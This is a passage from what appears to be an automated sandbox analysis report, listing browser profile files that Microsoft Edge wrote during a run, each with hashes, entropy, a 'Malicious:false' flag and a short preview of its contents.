                                                                                                                                                                                                                                                                                    SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                    MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                    SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                    SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                    SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b33f93e7-3740-447e-8d75-2f9089241ed5.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17848), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17848
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.480566193234313
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:st5PGQSu4IsJHFfhxDo7InTjbGrQw26WS0laTYM:szOXu6lffo4bGEt+2aTYM
                                                                                                                                                                                                                                                                                    MD5:BC2DB189A6292DB05D44703602409409
                                                                                                                                                                                                                                                                                    SHA1:6D8C05214F097E0278511E1EB49A6A4E591A53E3
                                                                                                                                                                                                                                                                                    SHA-256:A04ED0687FE45C6E11CAB97BDD08CBA3EB562E871DBB8BC180BF9648016E6F05
                                                                                                                                                                                                                                                                                    SHA-512:0441D37842ABFB5026D64DCD929AE62DA729460101698E82DA34D4360B1508904956DCF871E47FED87D404A3EDE707847874E9CD7FDBDA24EC719DE203BBBC91
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bc240223-3653-4863-a80d-cd159b992d4e.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9817
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116053717911298
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:st5kdpIsJHFsZihUkJBZP8AbV+FSCQA66WSiaFIMYOPKYJ:st5QIsJHFfhvbGrQx6WSiaTYM
                                                                                                                                                                                                                                                                                    MD5:4DE0BDB42BE872098111C0DA367123FB
                                                                                                                                                                                                                                                                                    SHA1:41DC28CF22706F0F448BE2953A92B9D5CB3AB34F
                                                                                                                                                                                                                                                                                    SHA-256:4837A4C833F75DDA62FFF1F786D37E3A51DD932633692D5A5B2E1F990B11BD05
                                                                                                                                                                                                                                                                                    SHA-512:893E21B0BFC0A4C19B6E0DDC1E23309E890F68A85ED3BDCB0630C8AA4E1E93CF2B8DA6CA7FD53FFE70950F3085D77E0D63D7C78C8A1FC8D843E76CCEF4B847B7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                    MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                    SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                    SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                    SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e29ea049-9979-4636-8f15-e8f1cf0c481d.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17683), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17683
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.483765492157562
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:st5PGQSu4IsJHFfhxDo7InTjbGrQw26WSuaTYM:szOXu6lffo4bGEt+uaTYM
                                                                                                                                                                                                                                                                                    MD5:635BDA77410EE181E268040DDE35E885
                                                                                                                                                                                                                                                                                    SHA1:E7B4F6A3A91561C7E3E9550841D5F33913D222C8
                                                                                                                                                                                                                                                                                    SHA-256:F18D61D7128887B6F82F9611966172B43155818214901D0D4A50BE8837B209C2
                                                                                                                                                                                                                                                                                    SHA-512:AF6C85B0A62BDE7BC91D4CBD68D843C903FAC90D5A8638F85AC5FE62E8AD17F51F24C0A133DDC3F473E4BCFE743E1EFB10B065C12D14E4CCD826BA56173D377D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fff99eeb-c372-43fa-b151-d355f16dd5a5.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.10249108720695506
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:+HHt5HHt4l5spEjVl/PnnnnnnnnnnnvoQ/Eou:+HH3HHGaoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                    MD5:1FB767D35B0997FAAAB6671621151486
                                                                                                                                                                                                                                                                                    SHA1:A14887C53340F536CA0DE29EF718A1FE5663735F
                                                                                                                                                                                                                                                                                    SHA-256:42176237BF543C3232C8BA6818EF655B9A6394292AA64A25A57B568A4363105D
                                                                                                                                                                                                                                                                                    SHA-512:561B1DD15646E71EB0A1F31C6C1331C9AC7CF4D1E4DF28CBBB82255109038B90F61C570951064A7A699FB7152DC29ED1DFAF98E522008CF2C43868994E891D03
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:..-.............M........W..Y.;..4..}....M......-.............M........W..Y.;..4..}....M............I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):317272
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8884581893490862
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:G24ARxDO0Lfg5oeWg04f86WgoOuY6WgY0lM6Wgu6m46WguVbA1h6Wg9gPv8WSy0p:Eb864Y6FM6i46eq6yziV
                                                                                                                                                                                                                                                                                    MD5:9C4DDCA9D9128A9C48C19FDD588ABF8B
                                                                                                                                                                                                                                                                                    SHA1:6C5684305FF5870DA12E403789D4CCEDAAB43C64
                                                                                                                                                                                                                                                                                    SHA-256:5C5E9533B46DF3DF09CA5B789ABE0B6A7B25BDAE89DDD39C5EAB2A0211051FFC
                                                                                                                                                                                                                                                                                    SHA-512:E105D7E98ECE2B6520470B3F4D328DA7FA211D22B612D65497A666598926ED0F93A8E771601E8AABC254902ECCD0CB9FDAFD04FDD9BDB881718A22D0E7D50403
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):694
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5319671444634193
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuPZlljZSD8E:iDAlIR
                                                                                                                                                                                                                                                                                    MD5:F86C68210E15484303C37455AC33D201
                                                                                                                                                                                                                                                                                    SHA1:E66AC42E89A9CB4E9C2A56DA87BB5F1A9A4BA151
                                                                                                                                                                                                                                                                                    SHA-256:FEEC8DF326C1B6E2C1524155A5DE8E31C9A16DC12F48FF10D89187EE475D5D58
                                                                                                                                                                                                                                                                                    SHA-512:EF8D5EC2306FF9615E871EE8E32DA830D00D00B0203A967F3036768B94E01F023F8D597D4BAB83A96C47100AB3F71C6EBDBD0478C7ACC20502C274B6C9CDAC08
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=................M.(;...............#38_h.......6.Z..W.F......@.......@..........V.e..................L.0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221687936773569
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:i4/+q2P923oH+TcwtfrK+IFUt8d4/Zmw+dnfHNVkwO923oH+TcwtfrUeLJ:i4Gv4Yeb23FUt8d4//+dnfHz5LYeb3J
                                                                                                                                                                                                                                                                                    MD5:24F5A05D62A8E8DAD7A578CA0124610D
                                                                                                                                                                                                                                                                                    SHA1:63FA49149BC9B937A886D1A26CE588F250AC9FC1
                                                                                                                                                                                                                                                                                    SHA-256:4B53AE306CD068AFEE45066D4668A4D5C7FD6AEC8AF66839D2FDFF5F5A34319A
                                                                                                                                                                                                                                                                                    SHA-512:35F3E5EA2D60A51C45BE17E4F78B9B56859A0BF6FA9276E1DF647E373EC18394A14864A00D5AAA25430D8888590270CB834C889AC0D0E4E0B953903D65413F8D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.405 1788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-08:47:12.405 1788 Recovering log #3.2024/12/27-08:47:12.406 1788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221687936773569
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:i4/+q2P923oH+TcwtfrK+IFUt8d4/Zmw+dnfHNVkwO923oH+TcwtfrUeLJ:i4Gv4Yeb23FUt8d4//+dnfHz5LYeb3J
                                                                                                                                                                                                                                                                                    MD5:24F5A05D62A8E8DAD7A578CA0124610D
                                                                                                                                                                                                                                                                                    SHA1:63FA49149BC9B937A886D1A26CE588F250AC9FC1
                                                                                                                                                                                                                                                                                    SHA-256:4B53AE306CD068AFEE45066D4668A4D5C7FD6AEC8AF66839D2FDFF5F5A34319A
                                                                                                                                                                                                                                                                                    SHA-512:35F3E5EA2D60A51C45BE17E4F78B9B56859A0BF6FA9276E1DF647E373EC18394A14864A00D5AAA25430D8888590270CB834C889AC0D0E4E0B953903D65413F8D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.405 1788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-08:47:12.405 1788 Recovering log #3.2024/12/27-08:47:12.406 1788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):787
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                    MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                    SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                    SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                    SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.166995829241005
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ihft+q2P923oH+TcwtfrzAdIFUt8dhf5Zmw+dEtVkwO923oH+TcwtfrzILJ:iVov4Yeb9FUt8dV5/+dET5LYeb2J
                                                                                                                                                                                                                                                                                    MD5:B7D72CF617D5C294A26FC41F0438F3D0
                                                                                                                                                                                                                                                                                    SHA1:F0D9C42CFB370EBD21EB08B7FEAFD308391DA582
                                                                                                                                                                                                                                                                                    SHA-256:9477F6B1ED09D1FBDD977589080EF1486DC951C4E935FD1BD8936C9133D9683B
                                                                                                                                                                                                                                                                                    SHA-512:EA8EB3429B028B6C216DE66C25EE246DC419A3E60FFDD02422EFAB6CC4F5BDA33D3CBDD320B45AB511DFAA16D78A32051FD6640067B66AF0493B6EB5E5DAD0CB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.400 1788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-08:47:12.400 1788 Recovering log #3.2024/12/27-08:47:12.401 1788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.166995829241005
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ihft+q2P923oH+TcwtfrzAdIFUt8dhf5Zmw+dEtVkwO923oH+TcwtfrzILJ:iVov4Yeb9FUt8dV5/+dET5LYeb2J
                                                                                                                                                                                                                                                                                    MD5:B7D72CF617D5C294A26FC41F0438F3D0
                                                                                                                                                                                                                                                                                    SHA1:F0D9C42CFB370EBD21EB08B7FEAFD308391DA582
                                                                                                                                                                                                                                                                                    SHA-256:9477F6B1ED09D1FBDD977589080EF1486DC951C4E935FD1BD8936C9133D9683B
                                                                                                                                                                                                                                                                                    SHA-512:EA8EB3429B028B6C216DE66C25EE246DC419A3E60FFDD02422EFAB6CC4F5BDA33D3CBDD320B45AB511DFAA16D78A32051FD6640067B66AF0493B6EB5E5DAD0CB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.400 1788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-08:47:12.400 1788 Recovering log #3.2024/12/27-08:47:12.401 1788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                    MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                    SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                    SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                    SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
